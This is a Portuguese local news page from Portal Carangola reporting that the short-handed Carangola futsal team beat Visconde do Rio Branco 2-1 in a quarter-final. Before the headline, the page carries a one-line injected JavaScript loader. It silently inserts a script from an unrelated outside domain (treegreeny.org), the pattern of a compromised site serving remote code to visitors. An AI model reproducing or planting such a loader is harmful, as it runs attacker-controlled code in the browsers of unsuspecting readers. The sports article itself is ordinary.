;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mesmo desfalcalda equipe de futsal de Carangola vence. - Portal Carangola

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Mesmo desfalcalda equipe de futsal de Carangola vence.

Desfalcado de 4 jogadores;uma viagem desgastante até a cidade de Ubá;apenas dois jogadores no banco de reservas. Nada disso foi empecilho para a equipe de futsal de Carangola, que de forma heróica venceu a primeira partida das quartas-de-final na noite de ontem, dia 26. O adversário era a forte equipe de Visconde do Rio Branco. Adotando uma postura defensiva e com uma forte marcação a equipe carangolense jogava buscando os contra-ataques. Num deles, Diego ainda no primeiro tempo abriu o placar para o time carangolense. Na segunda etapa a equipe de Visconde do Rio Branco empatou o jogo e quando parecia que o empate seria um grande resultado para o time carangolense, faltando 20 segundos para o término da partida, Diego sofre uma penalidade. Gustavo saiu do banco de reservas para decretar a heróica vitória de Carangola por 2 a 1. Carangola e Visconde do Rio Branco voltam a se enfrentar dia 06 de maio em Cataguases. Um empate basta ao time carangolense para chegar a chegar à semifinal. Uma derrota do time de Carangola independente do placar leva a decisao da vaga para a prorrogação. Com a vitória de ontem o time carangolense permanece invicto na competição. Agora sao 7 vitorias e 1 empate. Parabéns ao treinador Dante e aos nossos bravos guerreiros!